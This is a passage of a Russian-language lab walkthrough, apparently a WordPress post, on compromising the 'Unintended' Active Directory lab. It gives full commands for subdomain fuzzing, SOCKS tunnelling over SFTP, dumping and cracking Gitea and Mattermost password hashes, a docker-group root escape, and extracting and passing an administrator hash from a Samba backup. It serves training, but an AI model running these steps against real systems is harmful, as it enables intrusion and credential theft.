\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f, \u0441\u0445\u0435\u043c\u0430, \u0434\u0432\u0435 DNS-\u0437\u043e\u043d\u044b)\u041c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b.netexec smb 10.13.38.57 -u &#187; -p &#187; &#8212;shares\u0415\u0441\u0442\u044c \u043e\u0431\u0449\u0438\u0439 \u0440\u0435\u0441\u0443\u0440\u0441 home, \u043d\u043e \u043e\u043d \u043d\u0430\u043c \u043f\u043e\u043a\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d.\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 ASREProast.impacket-GetNPUsers -usersfile users.txt  unintended.vl\/\u041d\u043e \u043d\u0443\u0436\u043d\u044b\u0445 \u0444\u043b\u0430\u0433\u043e\u0432 \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\u041f\u0440\u043e\u0432\u0435\u0434\u0435\u043c \u0444\u0430\u0437\u0437\u0438\u043d\u0433 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u043e\u0432.ffuf -u http:\/\/10.13.38.59\/ -H &#8216;Host: FUZZ.unintended.vl&#8217; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -mc all -ac\u041d\u0430\u0448\u043b\u043e\u0441\u044c \u0434\u0432\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0435\u043c \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u0442\u0435\u0441\u0442 \u0441 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b.dnsenum &#8212;dnsserver 10.13.38.57 &#8212;enum -p 0 -s 0 -f \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt unintended.vl\u0417\u0434\u0435\u0441\u044c \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u0442\u044c\u0438 \u0443 \u043c\u0430\u0448\u0438\u043d\u044b \u0447\u0442\u043e-\u0442\u043e \u0441 \u0434\u043d\u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u0445\u043e\u0442\u044f \u043c\u0430\u0441\u0441\u043a\u0430\u043d \u0433\u043e\u0432\u043e\u0440\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0442 \u043e\u0442\u043a\u0440\u044b\u0442. \u0412\u044b\u0432\u043e\u0434 \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u0438\u043c.P.S. \u041f\u043e\u0437\u0436\u0435 \u044f \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0441\u044f, \u0434\u0435\u043b\u043e \u0431\u044b\u043b\u043e \u0432 \u043c\u043e\u0435\u043c \u0444\u0430\u0435\u0440\u0432\u043e\u043b\u0435, \u043e\u043d \u043f\u043e\u0447\u0435\u043c\u0443-\u0442\u043e \u043d\u0430\u0447\u0430\u043b \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c 53 \u043f\u043e\u0440\u0442.\u041f\u0440\u043e\u043f\u0438\u0448\u0435\u043c \u043d\u043e\u0432\u044b\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u044b \u0432 \u0444\u0430\u0439\u043b hosts.sudo nano \/etc\/hosts\u041f\u0435\u0440\u0435\u0439\u0434\u044f \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 \u043d\u0430\u0441 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u0442 Gitea: Git with a cup of tea.\u041f\u0435\u0440\u0435\u0439\u0434\u044f \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438, \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e \u0425\u0443\u0430\u043d \u0438\u043c\u0435\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439. \u0422\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\u041f\u043e\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u043c \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043a\u043e\u043c\u043c\u0438\u0442\u044b.http:\/\/code.unintended.vl\/juan\/DevOps\/commit\/7c54501b040a15a0e57beade1c8910609ec7c785 http:\/\/code.unintended.vl\/juan\/DevOps\/commit\/75f1f713696016f7713e33f836b05ce14784fc22\u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u0441 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043a ssh.ssh ftp_user@web.unintended.vl\u041d\u0430\u043c \u0434\u0430\u044e\u0442 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443 &#8212; This service allows sftp connections only.\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043f\u043e sftp \u043a\u0430\u043a \u043d\u0430\u043c \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442.sftp ftp_user@web.unintended.vl\u041d\u043e \u043d\u0430 ftp \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c.\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0440\u0430\u0437\u0434\u0435\u043b\u0443 \u043d\u0430 HackTricks, \u0441\u043b\u0443\u0436\u0431\u0430 SFTP \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u0430, \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u044f \u043f\u0435\u0440\u0435\u0430\u0434\u0440\u0435\u0441\u0430\u0446\u0438\u044e \u043f\u043e\u0440\u0442\u043e\u0432 \u0438 \u0442\u0443\u043d\u043d\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u043d\u0430 \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u0435\u0442 \u0432\u0445\u043e\u0434 \u043f\u043e SSH, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u043f\u043e\u0440\u0442\u0430\u043c \u0438 \u0441\u0435\u0442\u044f\u043c.\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u043c SOCKS-\u043f\u0440\u043e\u043a\u0441\u0438:ssh -D 1080 -N ftp_user@web.unintended.vl\u041f\u043e\u043f\u0440\u0430\u0432\u0438\u043c \u043a\u043e\u043d\u0444\u0438\u0433 proxychains4.sudo nano \/etc\/proxychains4.conf\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c nmap \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0440\u0442\u044b.sudo proxychains4 nmap -sT -Pn 127.0.0.1\u041d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043e\u0442\u043a\u0440\u044b\u0442 \u043f\u043e\u0440\u0442 mysql \u2013 3306.\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.sudo proxychains4 mysql -h 127.0.0.1 -u root -p\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.show databases;\u041d\u0430\u0441 \u0431\u0443\u0434\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u0442\u044c \u0431\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 gitea.\u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043d\u0435\u0451.use gitea;\u0418 \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0442\u0430\u0431\u043b\u0438\u0446\u044b.show tables;\u041d\u0430\u0441 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 users, \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043d\u0435\u0451.select email,passwd,passwd_hash_algo,salt,is_admin from user;\u041c\u044b \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u043c \u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c pbkdf2$50000, \u0441\u043e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b hashcat \u043c\u043e\u0436\u043d\u043e \u0443\u0437\u043d\u0430\u0442\u044c \u0440\u0435\u0436\u0438\u043c \u0434\u043b\u044f \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0430 \u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u0432\u0438\u0434 \u0445\u0435\u0448\u0430.10900PBKDF2-HMAC-SHA256 sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt\u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043d\u0443\u0436\u043d\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442.\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0432\u044b\u043f\u0438\u0448\u0435\u043c \u0445\u0435\u0448 \u0438 \u0441\u043e\u043b\u044c.\u0445\u0435\u0448 &#8212; f57a3d5d199ac8054c709e665b4eb4842f0e172a253a96038be5ef9e6fe7b0290f2d715524883dd117ac309e878c1dbbe902\u0441\u043e\u043b\u044c \u2014 6f7cf4aa34feb922092ef9f7ca342fa5\u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u043c \u0441\u043e\u043b\u044c \u0432 base64.echo &#8216;6f7cf4aa34feb922092ef9f7ca342fa5&#8217; | xxd -r -p | base64\u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u043c \u0445\u0435\u0448 \u0432 base64.echo &#8216;f57a3d5d199ac8054c709e665b4eb4842f0e172a253a96038be5ef9e6fe7b0290f2d715524883dd117ac309e878c1dbbe902&#8217; | xxd -r -p | base64\u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0444\u0430\u0439\u043b \u0434\u043b\u044f \u0431\u0440\u0443\u0442\u0430.sudo nano administrator.gitea.hash\u0418 \u0431\u0440\u0443\u0442\u0438\u043c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c hashcat.hashcat  -m10900 administrator.gitea.hash rockyou.txt\u041f\u0430\u0440\u043e\u043b\u044c \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u0431\u0440\u0443\u0442\u0438\u043b\u0441\u044f, \u043d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u043c \u0434\u043b\u044f \u0425\u0443\u0430\u043d\u0430, \u043d\u0430\u0441 \u0436\u0434\u0435\u043c \u043d\u0435\u0443\u0434\u0430\u0447\u0430.\u0421 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u0432 \u0430\u0434\u043c\u0438\u043d\u043a\u0443.\u041f\u0435\u0440\u0435\u0439\u0434\u044f \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u043e\u0432\u044b\u0439 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439.\u0412 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u044c.http:\/\/code.unintended.vl\/juan\/home-backup\/src\/branch\/main\/.bash_history\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0447\u0442\u043e \u0443\u0447\u0435\u0442\u043a\u0430 \u0432\u0430\u043b\u0438\u0434\u043d\u0430\u044f.netexec smb 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;shares\u041f\u043e\u043b\u0443\u0447\u0438\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 juan.netexec ldap 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;query &#171;(sAMAccountName=juan)&#187;  \u0425\u0443\u0430\u043d \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u0433\u0440\u0443\u043f\u043f\u0435 Web Developers.netexec ldap 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;query &#171;(sAMAccountName=abbie)&#187; &#171;&#187;\u042d\u0431\u0431\u0438 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0433\u0440\u0443\u043f\u043f\u0435 Backup Operators.\u0422\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b.netexec ldap 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;query &#171;(objectCategory=computer)&#187; &#171;&#187;\u0412\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0443 \u043d\u0430\u0441 \u0442\u0440\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u043f\u043e\u0434 \u0425\u0443\u0430\u043d\u043e\u043c, \u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u0441\u044f \u0438 \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433.ssh -l juan@unintended.vl web.unintended.vl \u041d\u0438\u043a\u0430\u043a\u0438\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 sudo \u043d\u0435\u0442.\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043d\u0430 Mattermost.sudo proxychains4 nmap -sT -Pn  127.0.0.1 -p8065\u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c FoxyProxy.http:\/\/127.0.0.1:8065\/login\u0417\u0430\u0445\u043e\u0434\u0438\u043c \u0432 Mattermost \u043f\u043e\u0434 \u0443\u0447\u0435\u0442\u043a\u043e\u0439 \u0425\u0443\u0430\u043d\u0430  \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0443.\u041a\u0440\u043e\u043c\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u044f \u043e \u043f\u0430\u0440\u043e\u043b\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0447\u0442\u043e \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u0435\u0441\u0442\u044c \u0431\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 PostgreSQL, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432 \u0434\u043e\u043a\u0435\u0440\u0435.\u041f\u043e\u0438\u0449\u0435\u043c \u044d\u0442\u0443 \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445.ps aux  | grep postgressudo proxychains4 nmap 172.18.0.3 -p5432 -Pn -sT\u041f\u043e\u0440\u0442 \u043e\u0442\u043a\u0440\u044b\u0442, \u0437\u043d\u0430\u0447\u0438\u0442 \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f.sudo proxychains4 psql -h 172.18.0.3 -d mattermost -U mmuser\u0421\u0432\u0435\u0440\u044f\u0441\u044c \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0435\u0439 https:\/\/github.com\/mattermost\/docker\/blob\/main\/env.example \u043c\u043e\u0436\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0438\u043c\u044f \u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043a \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\u0418\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u043c \u043d\u0443\u0436\u043d\u044b\u0435 \u043d\u0430\u043c \u0434\u0430\u043d\u043d\u044b\u0435.SELECT username,password,authdata,authservice,email,nickname,firstname,lastname,roles FROM users;\u0423 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0442\u0440\u0438 \u0445\u0435\u0448\u0430, \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043c \u0438\u0445 \u0432 \u0444\u0430\u0439\u043b.nano hashes.txt\u0423\u0437\u043d\u0430\u0435\u043c \u0442\u0438\u043f \u0445\u0435\u0448\u0430.hashid hashes.txt\u0412\u0441\u043f\u043e\u043c\u0438\u043d\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443 \u0438\u0437 \u0447\u0430\u0442\u0430 \u043a\u0430\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0441\u043e\u0437\u0434\u0430\u0435\u043c \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c cook.go install -v github.com\/glitchedgitz\/cook\/v2\/cmd\/cook@latest\/home\/kali\/go\/bin\/cook abbie,spencer,Abbie,Spencer,theabbs 1920-2024 &gt; abbie.wordlist\u0418 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c hashcat.hashcat -m3200 hashes.txt abbie.wordlist\u0421\u043d\u043e\u0432\u0430 \u0437\u0430\u0439\u0434\u0435\u043c \u0432 Mattermost, \u043d\u043e \u0443\u0436\u0435 \u043f\u043e\u0434 \u043d\u043e\u0432\u043e\u0439 \u0443\u0447\u0435\u0442\u043a\u043e\u0439, \u043d\u0430\u0439\u0434\u0435\u043c \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0443 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043d\u043e\u0432\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c.\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0443\u0447\u0435\u0442\u043a\u0443.netexec smb 10.13.38.57 -u abbie -p &#8216;Hiu8sy8SA8h2&#8217; &#8212;shares\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443.ssh -l abbie@unintended.vl backup.unintended.vl\u042d\u0431\u0431\u0438 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0433\u0440\u0443\u043f\u043f\u0435 Docker, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u0435\u0433\u043a\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root \u043d\u0430 \u0445\u043e\u0441\u0442\u0435, \u0441\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u043e\u0440\u043d\u0435\u0432\u0443\u044e \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0432 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0435.\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u044b.docker run -v \/:\/mnt &#8212;rm -it python:3.11.2-slim chroot \/mnt sh\u0417\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433.\u0412 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u043f\u0430\u043f\u043a\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u0430\u043f\u043a\u0443 scripts.\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0444\u0430\u0439\u043b server.py.cat server.py\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043b\u043e\u0433\u0438\u043d \u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u0434\u043b\u044f ftp \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u043a ftp \u0441\u0435\u0440\u0432\u0435\u0440\u0443. \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0431\u044d\u043a\u0430\u043f\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430.\u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0431\u044d\u043a\u0430\u043f\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430. \u0418 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f \u0441\u0430\u043c\u0431\u044b.\u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.tar -xvjf samba-backup-2024-02-17T20-32-13.580437.tar.bz2\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043c \u043d\u0443\u0436\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0441\u0430\u043c\u0431\u043e\u0439.sudo apt install ldb-tools -ysudo apt install samba-dsdb-modules -y\u0418\u0449\u0435\u043c \u0445\u0435\u0448 \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.ldbsearch -H private\/sam.ldb &#8216;(objectClass=user)&#8217; sAMAccountName &#8216;unicodepwd&#8217;\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u0445\u0435\u0448 \u0435\u0449\u0451 \u043d\u0443\u0436\u043d\u043e \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u0442\u044c.https:\/\/samba.tranquil.it\/doc\/en\/samba_fundamentals-about_password_hash.htmlpython3 -c &#171;import codecs, binascii; print(binascii.hexlify(codecs.decode(b&#8217;Nv4kHqDqpTPV+si9f7b4ow==&#8217;, &#8216;base64&#8217;)).decode())&#187;\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0445\u0435\u0448 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d\u0435.netexec smb 10.13.38.57 -u Administrator -H 36fe241ea0eaa533d5fac8bd7fb6f8a3\u0423\u0447\u0451\u0442\u043a\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0442\u0435\u043f\u0435\u0440\u044c \u0448\u0430\u0440\u044b \u043a \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043d\u0435 \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430.netexec smb 10.13.38.57 -u&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-481643","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/481643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=481643"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/481643\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=481643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=481643"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=481643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}